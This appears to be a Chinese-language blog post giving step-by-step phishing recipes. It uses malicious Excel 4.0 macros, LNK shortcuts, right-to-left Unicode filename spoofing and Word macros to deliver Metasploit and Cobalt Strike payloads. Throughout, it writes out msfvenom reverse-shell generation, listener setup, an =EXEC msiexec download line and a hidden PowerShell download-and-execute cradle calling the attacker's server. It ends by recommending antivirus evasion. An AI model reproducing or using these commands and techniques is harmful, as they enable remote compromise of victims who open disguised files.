1.钓鱼attack

excel宏钓鱼

生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.223.131 lport=4444 -f msi -o hack.msi 

开始监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.223.131
exploit 

将msi文件放到网站目录下,网站目录在 /var/www/html 下 ,开启服务器

systemctl start apache2

漏洞利用

Sheet1—>右键点击插入—>MS Excel宏表—>在第一行添加 =EXEC("msiexec /q /i [http://192.168.223.131](http://192.168.223.131)/hack.msi")—>第二行添加 =HALT(),修改第一列名字为 Auto_Open —>将宏右键隐藏—>保存为Excel启用宏的工作簿(.xlsm)—>打开后启用宏即可上线

lnk快捷方式钓鱼

开启CS

./teamserver 192.168.223.131 123456
./cobaltstrike

生成监听与脚本

生成HTTP监听,取名为site1

生成Script Web Delivery的powershell脚本,选64位

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.223.131:80/a'))"

漏洞利用

创建快捷方式并将powershell位置+恶意代码

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.223.131:80/a'))"

修改图标,里面都是Windows上的所有图标

%SystemRoot%\System32\shell32.dll

点击后即可上线

执行创建文件的命令是在powershell位置;图标是以powershell进行执行,删除也能继续运行,只是要快点从内存挪到服务

unicode字符钓鱼

在package中生成Windows Executable生成木马并放在服务器上

由于生成的是exe文件,需要对名字进行伪装(a.exe)

修改名字—>右键插入Unicode控制字符—>RLO(从右往左进行重写),再将自己的伪装粘贴上去,如3pm.exe粘贴进去后就会变成exe.mp3,之后换个mp3的图标,增加伪装性

真实名字是a3pm.exe,但看到的名字是aexe.mp3

word宏钓鱼

CS中生成word宏(Attack—>Packages—>MS Office Macro)并拷贝下来,放到目标机的txt文件下

新建一个word文档,在视图—>宏中创建一个宏,在Project—>Microsoft Word对象—>This document中插入代码并保存为启用宏的Word文档(.docm)

打开后启用宏即可

配合免杀效果更好

posted @ 2022-04-24 22:42  icui4cu  阅读(75)  评论(0编辑  收藏  举报